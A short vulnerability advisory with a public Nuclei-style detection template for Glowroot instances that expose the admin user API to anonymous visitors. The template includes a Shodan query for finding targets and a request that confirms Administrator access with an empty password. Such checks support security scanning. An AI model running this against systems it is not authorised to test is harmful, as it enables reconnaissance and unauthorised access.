unauthenticated-glowroot: Glowroot Anonymous User

Date: 2025-08-01 | Affected software: Glowroot | PoC: public

Vulnerability description

Anonymous user access allows an unauthenticated visitor to learn about the host internals.

PoC code [public]

id: unauthenticated-glowroot

info:
  name: Glowroot Anonymous User
  author: pussycat0x
  severity: high
  description: Anonymous user access allows to understand the host internals
  metadata:
    max-request: 1
    shodan-query: http.title:"Glowroot"
  tags: misconfig,unauth,glowroot,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/backend/admin/users?username=anonymous'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username":"anonymous"'
          - '"Administrator"'
          - '"newPassword":""'
        condition: and

      - type: word
        words:
          - "application/json"
        part: header

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b302f21e2fc3a94edb49d5f64563e8cc1409185b0de8f333809376fb006e697c022100b45d7d39c05ec2fbcef0daa2bb4cd9e2b01f6d4cd9930b973147231ef5f603a9:922c64590222798bb761d5b6d8e72950
